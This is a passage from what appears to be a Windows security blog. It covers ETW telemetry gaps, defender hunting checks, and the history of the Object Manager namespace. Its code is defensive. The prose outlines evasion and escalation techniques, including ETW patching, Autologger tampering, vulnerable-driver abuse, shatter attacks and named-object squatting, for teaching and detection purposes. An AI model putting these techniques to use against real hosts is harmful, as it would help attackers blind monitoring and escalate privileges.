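
console.log(resolveKeywordMask(buildA, wanted).mask === hardCoded); // true
console.log(onB.mask === hardCoded); // false
console.log((hardCoded & buildB.MAPVIEW_REMOTE) === 0n); // true: the hard-coded mask misses it
console.log(resolveKeywordMask(buildB, ["ALLOCVM_REMOTE", "WRITEVM_REMOTE"]).missing); // [ 'WRITEVM_REMOTE' ]
```

Resolving by name does not recover coverage that Microsoft removed, but it turns a silent false negative into an explicit `missing` entry a detection engineer can act on.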

There are three plausible reasons, and Microsoft has not stated which (or which combination) is operative. *Operational secrecy*: a complete keyword inventory tells attackers exactly which syscall paths are observed and which are not, narrowing the search for evasion paths. *Documentation cost*: the inventory shifts every build, and maintaining a synchronised public reference is engineering work without an obvious internal champion. *Deliberate moving target*: keeping the public surface incomplete forces attackers to reverse-engineer per build, raising the cost of stable evasion. The community references partially defeat all three rationales; the absence remains.

2. Secure ETW (the `EtwSi*` family)

Windows VBS Trustlets run in Virtual Trust Level 1 (VTL1) on top of the Secure Kernel, insulated from the normal-world kernel (VTL0) by the hypervisor. The Secure Kernel exposes its own ETW family for VTL1 components; it is documented only in fragments, in Alex Ionescu's Black Hat 2015 deck on the Secure Kernel and in subsequent BlueHatIL talks. There is no public consumer-facing primary on EtwSi* in 2026. Cross-link: this article's companion piece on VBS Trustlets [@paragmali-vbs-trustlets] covers the producer side of the story.

3. Forensic soundness of ETW telemetry

ETW is lossy by design (per the [@ms-about-etw] enumeration). Whether ETW-derived telemetry is forensically sound -- chain-of-custody complete, lossless under load, attestable as untampered between event emission and SIEM ingestion -- is an open question. Courts have not ruled. The current best partial result is to treat ETW as supporting evidence and require independent corroboration (file-system snapshots, network captures, OS state captures) for any claim that depends on completeness. Sysmon's Event ID 16 (Sysmon configuration changed) [@ms-sysmon] and the autologger registry write events on HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ are useful integrity signals: an attacker who silenced ETW typically leaves a footprint here.
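The Autologger integrity signal can be checked mechanically once Sysmon Event ID 13 records reach a SIEM. A minimal sketch, assuming the records are already parsed into objects carrying Sysmon's `EventID`, `Image`, and `TargetObject` fields; the baseline session names and sample events are illustrative, and `autologgerWrites` is a hypothetical helper.

```javascript
// Prefix under which Sysmon reports Autologger writes (compared case-insensitively).
const AUTOLOGGER_PREFIX = "HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\WMI\\AUTOLOGGER\\";

// Return the session name for a TargetObject under Autologger, or null.
function autologgerSession(targetObject) {
  if (!targetObject.toUpperCase().startsWith(AUTOLOGGER_PREFIX)) return null;
  return targetObject.slice(AUTOLOGGER_PREFIX.length).split("\\")[0];
}

// Every Event ID 13 write under the subtree is reported; writes to sessions
// outside the baseline are flagged as unexpected.
function autologgerWrites(events, baselineSessions) {
  const baseline = new Set(baselineSessions.map((s) => s.toUpperCase()));
  const findings = [];
  for (const ev of events) {
    if (ev.EventID !== 13) continue;
    const session = autologgerSession(ev.TargetObject);
    if (session === null) continue;
    findings.push({ session, image: ev.Image, unexpected: !baseline.has(session.toUpperCase()) });
  }
  return findings;
}

const events = [
  { EventID: 13, Image: "C:\\Windows\\System32\\reg.exe",
    TargetObject: "HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security\\Enabled" },
  { EventID: 13, Image: "C:\\Users\\Public\\updater.exe",
    TargetObject: "HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\FooTrace\\Start" },
  { EventID: 13, Image: "C:\\Windows\\explorer.exe",
    TargetObject: "HKCU\\Software\\Example\\Value" },
];

console.log(autologgerWrites(events, ["EventLog-Security", "DefenderApiLogger"]));
```

Writes to baseline sessions are still reported, because changing a value such as `Enabled` on an existing session is tampering too; the `unexpected` flag only separates "new session appeared" from "known session modified".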

4. The BYOVD arms race

The Vulnerable Driver Blocklist [@ms-vdb] is hash-based and updated quarterly. The LOLDrivers project [@loldrivers] documents the public catalogue of known-vulnerable signed drivers. The gap between disclosure and blocklist update -- as short as ~1 month via Patch Tuesday or up to a full quarter -- is the residual exploitation window. The deeper structural issue is the hash-based design itself: an attacker who finds a new vulnerability in a previously trusted signed driver gets a fresh window each time, lasting until a blocklist update adds that driver. Closing this gap requires either a different trust model (allow-listing of known-good drivers, as Smart App Control does for executables) or behavioural detection of suspicious driver loads. Both are active areas of work.
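The trust-model difference fits in a few lines. In this sketch drivers are identified by placeholder hash strings and both lists are hypothetical; it shows only the default each policy applies to a signed driver it has never heard of.

```javascript
// Placeholder identifiers, not real driver hashes.
const denyList = new Set(["hash-known-vulnerable-1", "hash-known-vulnerable-2"]);
const allowList = new Set(["hash-vendor-storage-driver", "hash-vendor-nic-driver"]);

// Deny-list model: load unless explicitly listed as bad.
const denyListPolicy = (hash) => !denyList.has(hash);

// Allow-list model: load only if explicitly listed as good.
const allowListPolicy = (hash) => allowList.has(hash);

// A signed driver whose vulnerability has not been reported yet.
const freshVulnerable = "hash-newly-vulnerable-but-signed";

console.log(denyListPolicy(freshVulnerable)); // true: loads until the list catches up
console.log(allowListPolicy(freshVulnerable)); // false: nobody vouched for it
```

The allow-list moves the failure mode rather than eliminating it: a driver already on the allow list that later turns out to be vulnerable still loads, and someone has to maintain the list of known-good drivers.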

5. Cross-process section-mapping coverage

EtwTi's KERNEL_THREATINT_TASK_MAPVIEW covers some but not all section-mapping primitives. The public fluxsec.red [@fluxsec-eti] inventory lists MAPVIEW_LOCAL and MAPVIEW_REMOTE keywords, but the underlying syscall set (NtMapViewOfSection, NtMapViewOfSectionEx, NtCreateSection, image-section vs file-section variants) is not exhaustively documented. Detection engineers who depend on full coverage of cross-process section mapping are working from an incomplete map.

What would a v2 ETW look like?

A theoretical ideal: synchronous kernel-emitted events on every security-relevant syscall, with the consumer running in VTL1 (Secure Kernel) so even a kernel-mode attacker in VTL0 cannot tamper with the consumer. The EtwSi* family is the partial realisation. The full ideal is incompatible with x64 syscall performance: synchronous notification on every syscall would dominate the cost of the syscall itself. The pragmatic answer Microsoft has been building toward is selective synchronous notification (the kernel notify routines for high-value control points) layered with broad asynchronous observation (ETW for everything else), with the most security-critical of the broad observations promoted to PPL/ELAM-gated kernel-emitted producers (EtwTi). Two decades of layering, no single architectural endpoint.

For the producer side of the Secure Kernel ETW story (EtwSi*), see this article's companion piece on VBS Trustlets [@paragmali-vbs-trustlets] in the same series. The Trustlet-side architecture is a separate topic large enough to need its own walkthrough.

Open problems are interesting but they are not actionable. The next section is about what an engineer can do on Monday morning.

14. Practical guide: five things to do Monday morning

You have read 12,000 words about ETW. Here are five concrete checks an engineer can run on a Windows host this morning.

Note: logman query providers enumerates every registered provider on the host. Cross-reference the output against the section 8 catalogue and flag any security-relevant provider your EDR is not consuming. Pay specific attention to Microsoft-Antimalware-Scan-Interface, Microsoft-Windows-PowerShell, Microsoft-Windows-DotNETRuntime, and Microsoft-Windows-Sysmon if Sysmon is installed. Missing coverage of any of these on a host you are responsible for is a detection-coverage gap, not a configuration issue.

Note: Run wevtutil gp Microsoft-Windows-Threat-Intelligence to confirm the provider is registered and inspect its keyword definitions. Then check whether your EDR is actually a consumer: follow the live-debugger handle enumeration in Yarden Shafir's Trail of Bits post [@trailofbits-shafir] (the WinDbg JS scripts are linked from the post). If your EDR is supposed to be ELAM-onboarded but does not appear in the consumer enumeration for an EtwTi logger session, your installation may have lost the gate. This is the difference between a configured EDR and a functional EDR.

Note: Enumerate HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ for unauthorised session entries. Per the Palantir CIRT taxonomy [@palantir-tampering-wayback], this is the persistent-tampering surface. A baseline audit should produce a known list of expected sessions (Defender, your EDR, Sysmon if installed, the standard Windows diagnostic listeners). Any subkey not on the baseline list is an investigation candidate. Sysmon Event ID 13 (registry value set) [@ms-sysmon] on this subtree is a high-signal alert in any SIEM.

Note: Run Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard | Select-Object SecurityServicesConfigured, SecurityServicesRunning, VirtualizationBasedSecurityStatus to expose whether VBS and HVCI are configured and running. The class lives in the root\Microsoft\Windows\DeviceGuard namespace, not the default one, and it does not report the Vulnerable Driver Blocklist directly; per the Microsoft Learn primary [@ms-vdb], however, the blocklist is enforced whenever HVCI is active. The BYOVD ceiling is your kernel-tampering integrity guarantee. If VBS is Off on a managed endpoint, your detection coverage is structurally weaker than it should be on supported hardware. Treat it as a hardening item, not a nice-to-have.

Note: Write a hunting query for the pattern: "process X registers as ETW consumer for Microsoft-Windows-Threat-Intelligence and X is not on the EDR allow-list." The provider's PPL+ELAM gate makes this a high-signal alert: only a signed Antimalware-PPL service can pass the gate, so an unexpected process holding an EtwConsumer handle to the TI logger ID is either a misconfigured tool, a legitimate research session you forgot about, or an attacker chain that has acquired Antimalware-PPL trust on your fleet. The first two are quick to triage; the third is an incident.

The structure of the check in pseudocode -- mirroring the WinDbg JS approach in [@trailofbits-shafir]:

```javascript
// Pseudocode: inventory providers and identify EtwTi consumers.
// Every enumerate*/load* helper and warn/alert are hypothetical placeholders
// for the data source named in the comment next to each call; none is a real API.
const TI_GUID = "{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}";
// GUID strings may come back in either case (logman prints them uppercase).
const sameGuid = (a, b) => typeof a === "string" && typeof b === "string" && a.toLowerCase() === b.toLowerCase();

// 1. Enumerate registered providers and find Microsoft-Windows-Threat-Intelligence.
const providers = enumerateRegisteredProviders(); // logman query providers equivalent
const tiProvider = providers.find((p) => sameGuid(p.guid, TI_GUID));
if (!tiProvider) {
  warn("EtwTi provider not registered on this host");
}

// 2. Enumerate live trace sessions and find any that subscribe to TI.
const sessions = enumerateLoggerSessions(); // logman query -ets equivalent
const tiSessions = sessions.filter((s) => s.providers.some((p) => sameGuid(p.guid, TI_GUID)));

// 3. Walk EtwConsumer handles for each TI session; identify the consuming processes.
const expectedConsumers = ["MsMpEng.exe", "CSFalconService.exe", "SentinelAgent.exe"];
for (const session of tiSessions) {
  const consumers = enumerateEtwConsumers(session.loggerId); // Shafir WinDbg JS
  for (const consumer of consumers) {
    if (!expectedConsumers.includes(consumer.processName)) {
      alert(`Unexpected EtwTi consumer: ${consumer.processName} (PID ${consumer.pid})`);
    }
  }
}

// 4. Audit autologger persistence entries against a known baseline.
const baseline = loadAutologgerBaseline();
const live = enumerateAutologgerSubkeys(); // HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger
for (const entry of live) {
  if (!baseline.includes(entry.name)) {
    alert(`Unexpected autologger entry: ${entry.name}`);
  }
}
```
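The Win32_DeviceGuard check from the practical guide can also be interpreted in code, for example when collecting it across a fleet. A minimal sketch, assuming the output of `Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard | Select-Object SecurityServicesRunning, VirtualizationBasedSecurityStatus | ConvertTo-Json` has been parsed. The value meanings used (VirtualizationBasedSecurityStatus 2 = running; SecurityServicesRunning containing 2 = memory integrity, i.e. HVCI) follow Microsoft's VBS documentation; `assessHardening` and its finding strings are hypothetical.

```javascript
// Meaning of VirtualizationBasedSecurityStatus values.
const VBS_STATUS = { 0: "not enabled", 1: "enabled, not running", 2: "running" };
const SERVICE_HVCI = 2; // SecurityServicesRunning entry for memory integrity (HVCI)

function assessHardening(deviceGuard) {
  const vbs = VBS_STATUS[deviceGuard.VirtualizationBasedSecurityStatus] ?? "unknown";
  // Accept either an array or a single value for the running-services list.
  const running = [].concat(deviceGuard.SecurityServicesRunning ?? []);
  const hvciRunning = vbs === "running" && running.includes(SERVICE_HVCI);
  return {
    vbs,
    hvciRunning,
    // Blocklist enforcement is implied only when HVCI is active; otherwise
    // check the Windows Security setting separately.
    finding: hvciRunning ? "ok" : "hardening item: enable VBS and memory integrity",
  };
}

const laptop = JSON.parse('{"SecurityServicesRunning":[0],"VirtualizationBasedSecurityStatus":1}');
const server = JSON.parse('{"SecurityServicesRunning":[1,2],"VirtualizationBasedSecurityStatus":2}');

console.log(assessHardening(laptop).finding); // hardening item: enable VBS and memory integrity
console.log(assessHardening(server).finding); // ok
```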

With those five checks, the catalogue is no longer an abstraction. You have an inventory of what your host emits, an inventory of who consumes the most security-critical provider, an audit of the persistence surface that defines what gets emitted at all, a confirmation of the integrity layer that closes BYOVD, and a hunt for anyone who has somehow obtained the passport. Now we close with the questions every reader should expect to have.

15. Frequently asked questions

Yes, for *publication*. Sysmon's kernel driver `SysmonDrv.sys` registers `PsSetCreateProcessNotifyRoutineEx` and the related thread- and image-load callbacks; the user-mode service then publishes the resulting events via its own `Microsoft-Windows-Sysmon` ETW provider GUID `{5770385F-C22A-43E0-BF4C-06F5698FFBD9}` [@ms-sysmon]. It does not consume the public catalogue providers via ETW for its kernel-event hot path; the kernel taps come straight from the callback API. This callback-then-publish architecture is why Sysmon's events are universally consumable by SIEM forwarders and downstream tools.

Because Defender consumes `Microsoft-Windows-Threat-Intelligence`, which fires from the kernel side of memory-modifying syscalls, not from the user-mode `ntdll!EtwEventWrite` trampoline. The fluxsec.red walkthrough states the asymmetry verbatim: "we cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself" [@fluxsec-eti]. The Adam Chester 2020 patch silences user-mode providers (like `Microsoft-Windows-DotNETRuntime`) for the patched process; it cannot silence kernel-emitted providers for any process. Defender's load-bearing security signal is structurally out of reach of the user-mode patch class.

No. The provider's security descriptor admits only Antimalware-PPL signers loaded by an ELAM driver. A non-PPL `EnableTraceEx2` call against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the Microsoft Learn primary on EnableTraceEx2 [@ms-enabletraceex2] documents the error code for insufficient-privilege callers; the PPL-specific gate that triggers it for EtwTi is described in [@fluxsec-eti]). The gate exists because an attacker who could trivially become an EtwTi consumer would have direct visibility into the kernel's view of every memory-modifying syscall on the host -- exactly the inventory needed to evade everything else.

Schema location. Manifest-based providers ship an out-of-band XML manifest registered with `wevtutil im`; consumers decode events against the system-installed manifest using TDH. TraceLogging providers carry the schema *inline* in each event payload as type-length-value triples; consumers decode without any registered manifest. TraceLogging events are larger because the schema bytes ride in the payload; manifest events have a smaller per-event size at the cost of installation friction. Both inherit the eight-session cap [@ms-about-etw], [@ms-tracelogging-about].

Sixty-four globally per [@ms-etw-sessions], with Windows 2000 limited to 32. Per-provider, manifest-based and TraceLogging providers admit up to 8 simultaneous sessions; classic and WPP providers admit only 1 [@ms-about-etw], [@ms-etw-config]. The runtime symptom of the per-provider 8-session cap binding is `ERROR_NO_SYSTEM_RESOURCES` from `EnableTraceEx2` [@ms-enabletraceex2]; the runtime symptom of the global 64-session cap binding is the same error from `StartTrace`.

No. EventPipe is a managed-runtime cross-platform analogue to ETW that shipped in .NET Core 3.0 (September 2019) and remains available in every later release including .NET 5+. It runs on Linux and macOS as well as Windows. On Windows, the kernel-mode providers and the EtwTi security substrate have no EventPipe equivalent; EventPipe is a complement to ETW for managed workloads, not a replacement. The Windows EDR substrate remains ETW; managed-runtime tracing has acquired an additional cross-platform path that does not displace it.
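The two session caps in the answers above can be modelled as a small state machine. This is an illustrative model only: `EtwCapModel` and its methods are hypothetical stand-ins for StartTrace and EnableTraceEx2, classic and WPP providers are left out, and the only real values used are the Win32 codes ERROR_NO_SYSTEM_RESOURCES (1450) and ERROR_ALREADY_EXISTS (183).

```javascript
const ERROR_SUCCESS = 0;
const ERROR_ALREADY_EXISTS = 183;
const ERROR_NO_SYSTEM_RESOURCES = 1450;

class EtwCapModel {
  constructor(maxSessions = 64, maxSessionsPerProvider = 8) {
    this.maxSessions = maxSessions; // global cap (StartTrace analogue)
    this.maxSessionsPerProvider = maxSessionsPerProvider; // manifest/TraceLogging cap
    this.sessions = new Set();
    this.enabledBy = new Map(); // provider GUID -> Set of session names
  }

  startTrace(sessionName) {
    if (this.sessions.has(sessionName)) return ERROR_ALREADY_EXISTS;
    if (this.sessions.size >= this.maxSessions) return ERROR_NO_SYSTEM_RESOURCES;
    this.sessions.add(sessionName);
    return ERROR_SUCCESS;
  }

  enableProvider(sessionName, providerGuid) {
    const enabled = this.enabledBy.get(providerGuid) ?? new Set();
    // Re-enabling in a session that already has the provider does not consume a slot.
    if (!enabled.has(sessionName) && enabled.size >= this.maxSessionsPerProvider) {
      return ERROR_NO_SYSTEM_RESOURCES;
    }
    enabled.add(sessionName);
    this.enabledBy.set(providerGuid, enabled);
    return ERROR_SUCCESS;
  }
}

const etw = new EtwCapModel();
const provider = "{00000000-0000-0000-0000-000000000001}"; // placeholder GUID
const results = [];
for (let i = 1; i <= 9; i++) {
  etw.startTrace(`Session${i}`);
  results.push(etw.enableProvider(`Session${i}`, provider));
}
console.log(results); // eight 0s, then 1450
```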

ETW is now twenty-six years old. It started as a performance facility for Windows 2000 driver authors who could not afford DbgPrint on production servers, and it became the substrate of every major Windows endpoint security product through a decade of unintended consequences. The Vista team that raised the per-provider session cap from 1 to 8 was thinking about ergonomics. The Windows 8.1 team that introduced Antimalware-PPL was thinking about Defender's hardening, not about future third-party EDRs. The team that shipped EtwTi in the Windows 10 RS-era understood the security stakes precisely. By 2026 those three decisions, taken in three different Microsoft contexts a decade apart, are the architecture of detection on the Windows endpoint -- and the reason the operator in the section 1 hook scene loses the round even when the patch works exactly as it should.

The Object Manager Namespace: The Hierarchical Filesystem Underneath Every Windows Security Boundary

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

**The Windows Object Manager namespace is the kernel-resident, filesystem-shaped tree that every Windows security boundary quietly assumes.** Every named kernel object -- processes, threads, sections, files, registry keys, tokens, mutants, semaphores, ALPC ports, devices, drivers, jobs, silos -- lives somewhere under `\`. Six generations of isolation primitives (Session 0 isolation, AppContainer lowbox, integrity levels, VBS trustlets, Server Silos, and the `ObRegisterCallbacks` EDR sensor surface) are all path rewrites, per-directory ACLs, or kernel callbacks layered on the same 1993 Cutler-era four-piece structure. This article builds the namespace bottom-up -- `OBJECT_HEADER`, `OBJECT_TYPE`, `ParseProcedure`, `OBJECT_DIRECTORY` -- walks the 2026 top-level directory atlas on Windows 11 25H2, surveys the exploit tradition (symbolic-link redirection, namespace squatting, bait-and-switch on `\??` and `\Device`, arbitrary directory creation), and closes on the EDR pivot in `ObRegisterCallbacks`.

1. The path that isn't a path

Open WinObj.exe as administrator on any Windows 11 25H2 machine. For about ten seconds the screen looks like a filesystem. The root is named \. Below it sit folders called \Device, \BaseNamedObjects, \Sessions, \RPC Control, \KnownDlls, and \ObjectTypes. Double-click any of them and you see children. Right-click any node and you can read a security descriptor. This is essentially the same UI a 1996 sysadmin would have recognised; the tool first shipped that year as part of Mark Russinovich and Bryce Cogswell's Winternals [@en-wikipedia-mark-russinovich], and the current build is a Microsoft-signed Sysinternals binary whose navigation surface has not been redesigned in three decades [@ms-winobj].

Navigate to \Sessions\1\AppContainerNamedObjects and the picture starts to fracture. Inside that directory you will find one subdirectory per running AppContainer-sandboxed app, each named after a long Security Identifier of the form S-1-15-2-.... Pick the one belonging to the Microsoft Edge renderer process you are reading this article in. Every named mutant, event, section, semaphore, and ALPC port the renderer can ever name lives inside that one subdirectory. The renderer cannot escape it. Not because of a permission check that comes second, but because the kernel rewrites every name the renderer asks for, transparently, before path resolution begins. Microsoft's AppContainer Isolation documentation [@ms-appcontainer-isolation] calls this "sandboxing the application kernel objects."
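The name substitution can be sketched as a pure function from (requested name, caller token) to a full namespace path. This is a simplified model under stated assumptions: it ignores the Global\ and Local\ prefixes and every other special case, treats the token as a plain object with hypothetical fields, and uses a placeholder package SID. It shows only where a lowbox caller's names land compared with an ordinary caller's.

```javascript
// Map a caller-supplied object name to the directory it resolves in.
function resolveNamedObjectPath(name, token) {
  if (token.isAppContainer) {
    // Lowbox callers are confined to their per-package directory.
    return `\\Sessions\\${token.sessionId}\\AppContainerNamedObjects\\${token.packageSid}\\${name}`;
  }
  // Ordinary callers: session 0 uses the global directory, other sessions their own.
  return token.sessionId === 0
    ? `\\BaseNamedObjects\\${name}`
    : `\\Sessions\\${token.sessionId}\\BaseNamedObjects\\${name}`;
}

const renderer = { isAppContainer: true, sessionId: 1, packageSid: "S-1-15-2-1111-2222" };
const desktopApp = { isAppContainer: false, sessionId: 1 };

console.log(resolveNamedObjectPath("SharedMutex", renderer));
// \Sessions\1\AppContainerNamedObjects\S-1-15-2-1111-2222\SharedMutex
console.log(resolveNamedObjectPath("SharedMutex", desktopApp));
// \Sessions\1\BaseNamedObjects\SharedMutex
```

Both callers asked for the same name and ended up in different directories; the sandboxed caller never chooses where its lookup starts.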

This tree is not a filesystem. There is no disk persistence; nothing under \ survives a reboot. It is not the Windows registry either; the registry is a separate subsystem with its own hive format that hangs off the namespace only through a parse procedure on the Key object type. What this tree is, instead, is the Object Manager namespace: the in-memory, kernel-resident, hierarchical name service that the Windows kernel uses to locate every nameable kernel object [@ms-managing-kernel-objects]. Its top-level directories are catalogued in the driver kit's Object Directories reference [@ms-object-directories].

The Windows Object Manager, internally called `Ob`, is a kernel-mode subsystem of the Windows Executive that manages the lifetime, naming, security, and accounting of every resource the kernel exposes to user mode as a named object. Wikipedia summarises it as a "subsystem implemented as part of the Windows Executive which manages Windows resources... each [resource] reside[s] in a namespace for categorization" [@en-wikipedia-object-manager].

Here is the thesis the rest of this article spends nine thousand words unpacking. Every Windows security boundary you have read about -- Session 0 isolation, Mandatory Integrity Control, AppContainer, the Virtualization-Based Security trustlets, Server Silos and Windows containers, the EDR sensor surface that fires when something opens a handle to lsass.exe -- is physically realised in this tree. Each boundary is either a path rewrite at lookup time, a per-directory ACL, a token-keyed name substitution, or a kernel callback registered against an OBJECT_TYPE. The boundaries you read about elsewhere are the policies; this tree is the mechanism.

The Object Manager has shipped without architectural change for thirty-three years. Whose decision was that? And why did a 1993 data structure survive untouched while the GUI, the driver model, the security subsystem, and the boot path around it were rewritten more than once?

2. Where the namespace came from

The decision belongs to Dave Cutler. The Wikipedia biography records the line of operating systems Cutler had developed at Digital Equipment Corporation (DEC): "RSX-11M, VAXELN, VMS, and MICA" [@en-wikipedia-dave-cutler]. Three of those shipped commercially; the fourth, MICA, was cancelled with the Prism RISC program. Cutler left DEC, and in 1988 Microsoft hired him with a charter from Bill Gates to build a portable next-generation kernel that could host the existing Windows API on top of a 32-bit, multi-architecture base [@en-wikipedia-architecture-of-windows-nt]. Cutler brought a small team of DEC veterans with him.

The Object Manager is one of that team's earliest design decisions. The architectural bet was to unify every named kernel object under one filesystem-shaped tree, with each type carrying a parse procedure so a single family of syscalls (NtCreateFile, NtOpenSection, NtOpenProcess, and so on) could address files, registry keys, processes, ports, sections, drivers, devices, jobs, and synchronization primitives using the same path-walk algorithm. That was an unusual choice in 1989. VMS had a more typed, less unified resource broker. Mach treated kernel objects as capability-style port rights and never gave them a hierarchical name. Cutler's choice was, at heart, a Plan-9-style "every named resource is a filesystem path" idea, imported into a Windows shell.

Plan 9 from Bell Labs (Pike, Thompson, et al.) was the academic articulation of the "everything is a path" property: every kernel-named resource, including processes and network connections, surfaced as a file under a 9P-served namespace. Plan 9 never reached commercial scale, but its design idea reached production through NT, and through Linux's /proc, /sys, and FUSE.

Windows NT 3.1 shipped on July 27, 1993. It was "Microsoft's first 32-bit operating system," supported on IA-32, DEC Alpha, and MIPS [@en-wikipedia-windows-nt-3-1]. The Object Manager was already one of its executive subsystems, sitting alongside the I/O Manager, the Memory Manager, the Process Manager, the Security Reference Monitor, and the Local Procedure Call subsystem [@en-wikipedia-architecture-of-windows-nt]. The four pieces this article will rebuild from scratch -- the OBJECT_HEADER that prefixes every object in memory, the OBJECT_TYPE singleton that owns each type's method table, the ParseProcedure that delegates path resolution to the owning subsystem, and the OBJECT_DIRECTORY hash table that maps names to objects -- were all in the NT 3.1 kernel. None of them has been rearchitected since.
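A toy model shows how the four pieces cooperate during a lookup. Everything here is a simplification, not NT's implementation: a JavaScript Map stands in for the OBJECT_DIRECTORY hash table, a plain `header` object stands in for OBJECT_HEADER, names are compared case-insensitively as if the caller had asked for that, symbolic links are followed by a special case in the loop, and access checks are omitted entirely. The namespace contents are illustrative.

```javascript
// OBJECT_TYPE stand-in: a name plus an optional parse procedure.
class ObjectType {
  constructor(name, parseProcedure = null) {
    this.name = name;
    this.parseProcedure = parseProcedure;
  }
}

const DirectoryType = new ObjectType("Directory");
const SymbolicLinkType = new ObjectType("SymbolicLink");
// The device's owning subsystem receives whatever path is left.
const DeviceType = new ObjectType("Device", (device, rest) => ({
  device: device.name,
  remainingPath: `\\${rest}`,
}));

// Every object carries a header pointing at its type (OBJECT_HEADER stand-in).
const makeObject = (type, body = {}) => ({ header: { type }, ...body });

function makeDirectory(entries = {}) {
  const table = new Map(); // OBJECT_DIRECTORY stand-in
  for (const [name, obj] of Object.entries(entries)) table.set(name.toUpperCase(), obj);
  return makeObject(DirectoryType, { table });
}

function lookup(root, path, maxReparse = 32) {
  let remaining = path.split("\\").filter(Boolean);
  let current = root;
  let reparses = 0;
  for (;;) {
    const type = current.header.type;
    if (type === SymbolicLinkType) {
      // Splice the link target in front of the unparsed components; restart at the root.
      if (++reparses > maxReparse) throw new Error("too many reparses");
      remaining = [...current.target.split("\\").filter(Boolean), ...remaining];
      current = root;
    } else if (remaining.length === 0) {
      return current;
    } else if (type === DirectoryType) {
      const child = current.table.get(remaining[0].toUpperCase());
      if (child === undefined) throw new Error(`name not found: ${remaining[0]}`);
      current = child;
      remaining = remaining.slice(1);
    } else if (type.parseProcedure !== null) {
      // Delegate the rest of the path to the type's parse procedure.
      return type.parseProcedure(current, remaining.join("\\"));
    } else {
      throw new Error(`${type.name} objects cannot be traversed`);
    }
  }
}

const root = makeDirectory({
  Device: makeDirectory({ HarddiskVolume3: makeObject(DeviceType, { name: "HarddiskVolume3" }) }),
  "GLOBAL??": makeDirectory({ "C:": makeObject(SymbolicLinkType, { target: "\\Device\\HarddiskVolume3" }) }),
});

const result = lookup(root, "\\GLOBAL??\\C:\\Windows\\System32\\ntdll.dll");
console.log(result.device); // HarddiskVolume3
console.log(result.remainingPath); // \Windows\System32\ntdll.dll
```

The Object Manager walks only the part of the path it owns; once it reaches an object whose type supplies a parse procedure, the rest of the string belongs to that subsystem.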

That same year, Microsoft Press published Inside Windows NT, written by technical writer Helen Custer with a Foreword by Cutler himself. The book's Object Manager chapter is the canonical pre-2000 description of the namespace, cited on the Sysinternals WinObj page [@ms-winobj] as "Helen Custer's Inside Windows NT provides a good overview of the Object Manager namespace." Custer's book has been out of print for two decades, but the citation chain through Russinovich's tool is durable.

Three years later, in 1996, Russinovich and Cogswell co-founded Winternals and released WinObj 1.0 [@en-wikipedia-mark-russinovich]. WinObj was the first publicly distributed tool to walk \ from user mode, using the native NtOpenDirectoryObject and NtQueryDirectoryObject syscalls that the Object Manager exposed through NTDLL [@ms-winobj]. The following year, Russinovich's October 1997 Windows IT Pro column "Inside the Object Manager" gave the namespace its first treatment in the trade press. The original URL did not survive changes to TechTarget's web property portfolio in 2025 (TechTarget was acquired by Informa PLC in 2025), but the WinObj page still cites the column by name as "Mark's October 1997 [WindowsITPro Magazine] column, 'Inside the Object Manager'."

Because the column has no surviving direct URL, the WinObj page is its most accessible surviving citation. Helen Custer's 1993 book is in a similar position: her Wikipedia biography returns HTTP 404 in 2026, and the book (ISBN 1-55615-481-X) survives in used-book channels only.

The line of book-length internals references that began with Custer continued through Inside Windows 2000 (third edition) and the Windows Internals series that succeeded it. The 7th edition Part 1 was published by Microsoft Press in May 2017, authored by Pavel Yosifovich, Alex Ionescu, Mark Russinovich, and David A. Solomon [@microsoftpressstore-wininternals7-part1]; the edition's Object Manager coverage, Chapter 8 ("System mechanisms"), appears in Part 2 and is the current canonical reference. James Forshaw's April 2024 Windows Security Internals [@nostarch-windows-security-internals] is the contemporary companion that ties the namespace into the access-check pipeline.

The 1993 design assumed a single global namespace. One process tree, one \BaseNamedObjects, one \Windows\WindowStations\WinSta0, one \?? view of DOS device letters. Everyone shared everything. Did that assumption survive the Internet?

3. The pre-Vista namespace and how it broke

It did not. By the late 1990s every interactive Windows user was sharing a name service with every running service. The single-global-namespace assumption produced three distinct exploit classes, each rediscovered repeatedly between 1996 and 2007, and each ultimately closed only by architectural change.

The most public failure was the shatter attack. In August 2002 a researcher named Chris Paget published a paper titled "Exploiting design flaws in the Win32 API for privilege escalation." Wikipedia's article on the disclosure preserves the chronology: "Shatter attacks became a topic of intense conversation in the security community in August 2002 after the publication of Chris Paget's paper" [@en-wikipedia-shatter-attack]. The proof-of-concept was about thirty lines. As an unprivileged interactive user, Paget sent a WM_TIMER window message to a service's hidden window in the same \Windows\WindowStations\WinSta0 (which all services and all interactive users shared in pre-Vista Windows), with a callback parameter pointing to attacker-placed shellcode. The shellcode ran as SYSTEM.

Microsoft's initial response, preserved in the Wikipedia article, was that "the flaw lies in the specific, highly privileged service": a per-service bug, so patch the services. That stance did not survive the structural-class argument. The exploit was not a bug in one service. It was a property of the namespace: as long as services and users shared a window station and a \BaseNamedObjects, any service that pumped window messages for a window in that shared window station was reachable from any logged-in user.

Note: A second class of pre-Vista failure was named-object squatting. A low-privilege user pre-creates \BaseNamedObjects\Some_Global_Event with a permissive DACL. A privileged service later calls CreateEvent("Some_Global_Event") with default open-or-create semantics and ends up inheriting the squatter's object, security descriptor and all. This is not one service-author's bug; it is the consequence of every service-author trusting that names in a shared namespace would resolve to objects they themselves created. The pattern has been rediscovered approximately once a year for two decades. James Forshaw documents the contemporary named-pipe analog in his 2017 "Named Pipe Secure Prefixes" post [@tiraniddo-named-pipe-secure-prefixes], where the SMSS-created prefixes \Device\NamedPipe\ProtectedPrefix\Administrators, \Device\NamedPipe\ProtectedPrefix\LocalService, and \Device\NamedPipe\ProtectedPrefix\NetworkService are TCB-privilege-gated -- only smss.exe can create sibling protected prefixes, so a service that publishes its pipe below one of these prefixes inherits a DACL that low-privilege squatters cannot reach.
